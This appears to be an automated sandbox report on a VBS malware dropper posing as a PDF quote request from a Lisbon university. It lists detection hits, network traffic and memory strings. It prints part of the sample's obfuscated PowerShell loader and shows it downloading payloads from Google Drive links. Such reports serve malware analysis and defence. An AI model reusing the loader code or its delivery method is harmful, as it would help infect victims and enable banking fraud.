              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7820, ProcessName: svchost.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T20:48:26.633409+010028033053Unknown Traffic192.168.2.1149708142.250.185.110443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T20:49:24.336056+010028032702Potentially Bad Traffic192.168.2.1149720142.250.185.110443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsVirustotal: Detection: 16%Perma Link
              Source: PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: Yara matchFile source: 00000010.00000002.1904170873.00000000087D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.11:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.11:49721 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1712568082.00000000083E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdb4 source: powershell.exe, 0000000E.00000002.1712568082.00000000083E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbpdb~B source: powershell.exe, 00000004.00000002.1359664490.0000021AA0D9D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000004.00000002.1361008061.0000021AA0FAE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ;.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1359664490.0000021AA0D9D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000E.00000002.1706090997.0000000007319000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49708 -> 142.250.185.110:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49720 -> 142.250.185.110:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 0000000E.00000002.1706090997.0000000007340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microdX
              Source: wscript.exe, 00000000.00000003.1073465982.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073959265.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073553897.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074125966.0000021B283CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
              Source: wscript.exe, 00000000.00000003.1073465982.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073553897.0000021B283CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/G
              Source: wscript.exe, 00000000.00000002.1095397613.0000021B2651B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1094557852.0000021B2651B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1094196357.0000021B2650F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1095397613.0000021B2651B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073465982.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1094557852.0000021B2651B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073959265.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074527416.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1094196357.0000021B2650F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1073553897.0000021B283CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074125966.0000021B283CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1074015402.0000021B2656D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1074197954.0000021B26594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?fc86edce5f
              Source: svchost.exe, 00000006.00000003.1211559844.000001959DE90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1684008021.0000000004991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000E.00000002.1706090997.0000000007340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.G
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000E.00000002.1684008021.0000000004991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1320482989.0000021A88C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1L
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LW
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWp
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1P
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PK
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-E
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6L
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6Lt
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6Ltt
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6Lttk
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6Lttkm
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC2
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22K
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KN
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNv
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9Q
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9Qe
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A8A15E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8ZP
              Source: powershell.exe, 0000000E.00000002.1684008021.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8ZXR
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000010.00000003.1866198486.0000000008806000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1904170873.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1LWpU1PKL-P-EM6LttkmC22KNvM9QeS8Z&export=download
              Source: svchost.exe, 00000006.00000003.1211559844.000001959DEF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: svchost.exe, 00000006.00000003.1211559844.000001959DE90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1320482989.0000021A88E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1320482989.0000021A88E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000004.00000002.1320482989.0000021A88E9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1320482989.0000021A88E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.11:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.11:49721 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000010.00000002.1904170873.00000000087D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: amsi64_7608.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_3064.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 